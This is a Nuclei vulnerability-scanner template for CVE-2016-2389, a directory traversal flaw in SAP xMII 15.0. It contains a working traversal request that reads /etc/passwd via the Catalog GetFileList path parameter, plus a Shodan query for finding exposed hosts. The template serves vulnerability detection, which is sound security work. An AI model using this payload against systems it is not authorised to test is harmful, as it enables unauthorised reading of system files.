nuclei-templates/http/cves/2016/CVE-2016-2389.yaml

42 lines
1.5 KiB
YAML

id: CVE-2016-2389
info:
name: SAP xMII 15.0 for SAP NetWeaver 7.4 - Local File Inclusion
author: daffainfo
severity: high
description: SAP xMII 15.0 for SAP NetWeaver 7.4 is susceptible to a local file inclusion vulnerability in the GetFileList function. This can allow remote attackers to read arbitrary files via a .. (dot dot) in the path parameter to /Catalog, aka SAP Security Note 2230978.
reference:
- https://web.archive.org/web/20211209003818/https://erpscan.io/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/
- http://packetstormsecurity.com/files/137046/SAP-MII-15.0-Directory-Traversal.html
- https://www.exploit-db.com/exploits/39837/
- https://nvd.nist.gov/vuln/detail/CVE-2016-2389
- http://seclists.org/fulldisclosure/2016/May/40
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2016-2389
cwe-id: CWE-22
epss-score: 0.24589
cpe: cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:*
metadata:
max-request: 1
shodan-query: http.favicon.hash:-266008933
vendor: sap
product: netweaver
tags: packetstorm,seclists,lfi,sap,edb,cve,cve2016
http:
- method: GET
path:
- "{{BaseURL}}/XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200